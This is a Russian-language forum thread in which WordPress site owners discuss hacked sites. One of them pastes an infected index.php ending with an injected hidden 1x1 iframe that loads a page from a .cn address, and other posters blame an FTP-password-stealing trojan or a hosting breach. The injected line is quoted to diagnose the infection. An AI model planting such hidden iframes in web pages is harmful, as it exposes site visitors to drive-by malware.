Стоят два сайта с последней версией WordPress.
Утром захожу – выдаёт синтаксические ошибки.
При просмотре index.php обнаружились сторонние записи с нарушением синтакса 🙂
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?<html><body><iframe src="http://адрес.cn/in/" width=1 height=1 style="visibility: hidden"></iframe></body></html>>Не подскажите – как это могло произойти? Да еще на двух движках одновременно?
Обратите внимание на последние строки
Ну, троян обыкновенный. Ничего оригинального. Уже сто раз обсуждали.
у меня за последние 2 недели два раза таким образом были взломаны сайты. первый раз 6 из 15 сайтов имели ифрейм что ты указал! точь в точь! устранил проблему перезаписав все индексные файлы: индексный файл вордпресса, индексный файд wp-admin и индексный фалй темы!!! сейчас заново перезаписываю все индексные файлы. только взломаны все 15 сайтов! таким же образом через ифрейм только ссылка другая ссылается на /ftp!!! у меня кстати кластерный хостинг РБК!!! как это мы с тоюой одинаково попали? люди здесь что-то не так! хостер 12 часов до первого взлома сайтов был недоступен!
Вариант взлома хостера тоже не исключен, хотя вероятность ниже, чем троян у юзера.
Троян крадет пароли FTP проверьте свой комп на вирусы и смените ftp пароль.